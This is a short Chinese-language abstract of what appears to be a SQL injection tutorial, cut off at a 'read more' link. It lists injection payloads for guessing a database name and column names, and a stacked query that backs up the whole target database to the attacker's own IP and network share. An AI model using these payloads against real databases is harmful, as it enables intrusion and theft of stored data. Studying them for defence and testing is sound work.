摘要:
最简单的一种SQL注入,常见的注入语句还有:1)猜测数据库名,备份数据库a)猜测数据库名:and db_name() >0或系统表master.dbo.sysdatabasesb)备份数据库:;backup database数据库名to disk = ‘c:\*.db’;--或:declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--2)猜解字段名称a)猜解法:and (select count(字段名) from表名 阅读全文